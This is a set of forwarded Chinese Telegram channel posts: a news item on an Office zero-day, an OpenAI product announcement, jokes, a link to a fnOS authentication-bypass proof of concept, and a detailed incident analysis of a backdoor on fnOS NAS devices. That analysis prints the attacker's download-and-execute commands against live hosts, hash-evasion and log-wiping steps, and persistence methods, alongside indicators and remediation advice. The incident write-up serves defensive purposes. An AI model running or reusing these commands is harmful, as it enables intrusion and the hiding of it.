Forwarded from Yummy 😋
Office漏洞正被黑客大量利用,2016、2019、2021、365全中招
微软近日发现了一个严重的Office零日漏洞(CVE-2026-21509),该漏洞已被黑客广泛利用,用户仅需打开恶意Office文件,系统就可能被远程控制。
据微软介绍,该漏洞在(CVSS)中得分为7.8/10,属于高风险等级,该漏洞源于Office底层设计缺陷,导致Office错误地信任了某些不应被信任的输入数据。
黑客可以利用这一漏洞制作带有恶意代码的Office文件,绕过OLE安全防护机制,从而在用户打开文件时远程执行恶意代码。
对于Office 2021和Microsoft 365用户,可以通过在线更新获得修复,但需要重启系统后才能生效。
较旧的Office 2016和Office 2019版本用户需要手动下载以下版本的更新文件:
🗒 标签: #微软 #Office
📢 频道: @GodlyNews1
🤖 投稿: @GodlyNewsBot
微软近日发现了一个严重的Office零日漏洞(CVE-2026-21509),该漏洞已被黑客广泛利用,用户仅需打开恶意Office文件,系统就可能被远程控制。
据微软介绍,该漏洞在(CVSS)中得分为7.8/10,属于高风险等级,该漏洞源于Office底层设计缺陷,导致Office错误地信任了某些不应被信任的输入数据。
黑客可以利用这一漏洞制作带有恶意代码的Office文件,绕过OLE安全防护机制,从而在用户打开文件时远程执行恶意代码。
对于Office 2021和Microsoft 365用户,可以通过在线更新获得修复,但需要重启系统后才能生效。
较旧的Office 2016和Office 2019版本用户需要手动下载以下版本的更新文件:
* Microsoft Office 2019(32位版本):16.0.10417.20095
* Microsoft Office 2019(64位版本):16.0.10417.20095
* Microsoft Office 2016(32位版本):16.0.5539.1001
* Microsoft Office 2016(64位版本):16.0.5539.1001
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 未題名の四月と海 (Krau)
宝宝 你根本不适合玩tg啊,你一不缺爱,二没有精神病,三没有回避型,四没有猫塑狗塑自己,五没有自嬷自公,六没有乱七八糟的关系,七说话不土,八长相不丑,九不爱说原生家庭
Forwarded from 爆発試験室 | BakaMai Vtuber | Tech & LifeStyle (バカマイ| 0.091T)
Forwarded from LoopDNS资讯播报
OpenAI 发布 集成 GPT-5.2 的免费云端 LaTeX 科研写作平台 Prism
OpenAI 正式推出 Prism,一款面向科研人员的免费云端 LaTeX 原生写作与协作平台。该产品将 GPT-5.2 直接嵌入科学写作流程,定位为“科研级写作标准化工作区”。Prism 以 LaTeX 为核心,提供在线撰写、实时编译与即时预览能力,无需本地环境配置。平台支持无限项目与无限协作者,主打解决科研协作中常见的版本冲突、手动合并与反复编译问题。内置的项目感知型 AI 可在完整论文上下文中工作,覆盖摘要生成、语言校对、结构优化、推理检查,并可随内容演进同步更新公式、表格与参考文献。
Prism 集成文献检索与引用管理功能,支持与 Zotero 同步,同时提供自动排版、LaTeX 错误检查、公式与图片转代码、语音转代码等自动化工具,减少格式整理与技术性负担。面向长期、严肃科研写作的统一工作空间,强调其免费策略与不限协作者模式,意在降低科研写作与协作的技术门槛。
OpenAI
OpenAI 正式推出 Prism,一款面向科研人员的免费云端 LaTeX 原生写作与协作平台。该产品将 GPT-5.2 直接嵌入科学写作流程,定位为“科研级写作标准化工作区”。Prism 以 LaTeX 为核心,提供在线撰写、实时编译与即时预览能力,无需本地环境配置。平台支持无限项目与无限协作者,主打解决科研协作中常见的版本冲突、手动合并与反复编译问题。内置的项目感知型 AI 可在完整论文上下文中工作,覆盖摘要生成、语言校对、结构优化、推理检查,并可随内容演进同步更新公式、表格与参考文献。
Prism 集成文献检索与引用管理功能,支持与 Zotero 同步,同时提供自动排版、LaTeX 错误检查、公式与图片转代码、语音转代码等自动化工具,减少格式整理与技术性负担。面向长期、严肃科研写作的统一工作空间,强调其免费策略与不限协作者模式,意在降低科研写作与协作的技术门槛。
OpenAI
Forwarded from LoopDNS资讯播报
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件
漏洞编号:暂无(官方未公开 / 未分配 CVE)
重要等级:严重(高危)
CVSS 分数:暂无
影响范围:
fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发)
受影响系统:
fnOS(版本范围未公开)。官方社区回复称该问题官方已知,建议升级至 1.1.15,并在关闭公网端口映射后验证异常上传/连接是否停止。
木马行为分析
目前LoopDNS频道编辑已获取相关木马文件,下为行为分析
1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行(观测到的命令链)
2.后门驻留组件 gots
A1. 写入后门主体与持久化文件
A2. C2 通信与探测
3. 组件 trim_https_cgi
清理痕迹
干扰业务与恢复功能
二阶段下载执行与启动脚本注入
4.内核模块 snd_pcap(论坛排查)
关键落地痕迹
可疑网络基础设施(IOC)
处置建议
1. 关闭公网端口映射/源站直通。
2. 升级 fnOS 至官方建议版本(1.1.15 或更高)。
3. 出口防火墙封禁:45.95.212.102、151.240.13.91,同时监控连接数与上传是否回落。
4. 轮换所有管理口令/密钥;检查容器、计划任务、数据盘是否存在触发残留(官方提示“重装后仍可能再次触发”)。
参考来源:飞牛社区
漏洞编号:暂无(官方未公开 / 未分配 CVE)
重要等级:严重(高危)
CVSS 分数:暂无
影响范围:
fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发)
受影响系统:
fnOS(版本范围未公开)。官方社区回复称该问题官方已知,建议升级至 1.1.15,并在关闭公网端口映射后验证异常上传/连接是否停止。
木马行为分析
目前LoopDNS频道编辑已获取相关木马文件,下为行为分析
1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行(观测到的命令链)
cd /tmp
wget http://20.89.168.131/nginx
chmod 777 nginx
head -c 16 /dev/urandom >> nginx(向文件追加随机字节,改变哈希,规避基于哈希的检测)
./nginx
wget http://20.89.168.131/trim_https_cgi
chmod 777 trim_https_cgi
head -c 16 /dev/urandom >> trim_https_cgi
./trim_https_cgi
外联与拉取补充组件
HTTP:GET http://151.240.13.91/trim_fnos
TCP:连接 45.95.212.102:6608
2.后门驻留组件 gots
A1. 写入后门主体与持久化文件
创建/写入:/sbin/gots
创建/写入:/etc/rc.local、/etc/rc.d/rc.local
创建/写入 systemd 服务(变种服务名):
/etc/systemd/system/x86.service
/etc/systemd/system/<sha256>.service
执行持久化:systemctl enable <service>.service(含重定向到 /dev/null 的静默执行)
自身复制/改名落地:
/usr/bin/x86(样本发生目录重命名/落地)
/usr/bin/<sha256>(样本发生目录重命名/落地)
A2. C2 通信与探测
DNS:解析 aura.kabot.icu -> 45.95.212.102
TCP:连接 45.95.212.102 多端口(观测到:3489、5098、6608、7489)
论坛样本显示的附加行为(strings/排查结论)
干扰系统工具:重命名/替换 cat(出现 mv /usr/bin/cat /usr/bin/cat2 等字符串,导致“cat 丢失”现象)
结束系统进程:pkill -f 'network_service|resmon_service'
修改持久化入口:改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
外联:包含 45.95.212.102 字符串并进行访问
3. 组件 trim_https_cgi
清理痕迹
清空多目录日志:/var/log/*、/usr/trim/logs/*、/run/log/journal 等
删除审计日志:/var/log/audit/audit.log 及滚动文件
删除/清理安全相关日志:/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等
干扰业务与恢复功能
结束服务:pkill -f backup_service、pkill -f sysrestore_service 等
二阶段下载执行与启动脚本注入
修改 /usr/trim/bin/system_startup.sh,追加下载执行链:
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
端口相关痕迹与疑似隐藏监听(来源于论坛排查)
目标系统存在 0.0.0.0:57132 LISTEN,ss/netstat 无 PID,lsof/fuser 无结果
trim_https_cgi 字符串包含 57132,并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑(提示该端口为其链路的一部分)
4.内核模块 snd_pcap(论坛排查)
/etc/modules 被追加 snd_pcap
模块文件:/lib/modules/6.12.18-trim/snd_pcap.ko
与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑(疑似内核层隐藏/驻留能力)
关键落地痕迹
不可变属性(immutable,需先 chattr -i 才能删除):
/usr/bin/nginx
/usr/sbin/gots
/usr/trim/bin/trim_https_cgi
/etc/systemd/system/nginx.service
/etc/systemd/system/trim_https_cgi.service
/etc/rc.local
伪装/复用:/usr/bin/nginx 与 /usr/sbin/gots md5 相同(同一载荷多名称投放)
rc.local 自启:/sbin/gots x86 &
systemd 自启(示例):ExecStart=/usr/bin/nginx x86(oneshot + enable)
可疑网络基础设施(IOC)
IP:45[.]95[.]212[.]102(C2/多端口连接)
IP:151[.]240[.]13[.]91(HTTP 拉取二阶段:/trim_fnos、论坛样本)
域名:aura[.]kabot[.]icu(解析到 45[.]95[.]212[.]102)
下载源:20[.]89[.]168[.]131(HTTP 拉取:/nginx、/trim_https_cgi)
归属信息:45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段
处置建议
1. 关闭公网端口映射/源站直通。
2. 升级 fnOS 至官方建议版本(1.1.15 或更高)。
3. 出口防火墙封禁:45.95.212.102、151.240.13.91,同时监控连接数与上传是否回落。
4. 轮换所有管理口令/密钥;检查容器、计划任务、数据盘是否存在触发残留(官方提示“重装后仍可能再次触发”)。
参考来源:飞牛社区
Forwarded from .
PoC:飞牛OS(fnOS)RCE链:认证绕过
无需longtoken,拿到rsa_private_key.pem就可以任意伪造签名
https://github.com/bron1e/fnos-rce-chain
无需longtoken,拿到rsa_private_key.pem就可以任意伪造签名
https://github.com/bron1e/fnos-rce-chain
GitHub
GitHub - bron1e/fnos-rce-chain: 飞牛系统(fnOS)远程代码执行链:认证绕过
飞牛系统(fnOS)远程代码执行链:认证绕过. Contribute to bron1e/fnos-rce-chain development by creating an account on GitHub.
Forwarded from 赤石英雄 (ジュード·グレイ)
最开始我买股票,只有下跌才亏钱💃🏻
然后学会了做空 上涨也亏钱💃🏻
我然后学会了期权,价格不变也亏钱💃🏻
我最后学会了杠杆,10 倍速亏钱💃🏻
最早只会炒 a 股,上班才亏钱💃🏻
然后学会了美股,晚上睡觉也亏钱💃🏻
我然后学会了炒币,周末也亏钱💃🏻
我最后学会了融资,没钱也亏钱💃🏻
然后学会了做空 上涨也亏钱💃🏻
我然后学会了期权,价格不变也亏钱💃🏻
我最后学会了杠杆,10 倍速亏钱💃🏻
最早只会炒 a 股,上班才亏钱💃🏻
然后学会了美股,晚上睡觉也亏钱💃🏻
我然后学会了炒币,周末也亏钱💃🏻
我最后学会了融资,没钱也亏钱💃🏻
🗿1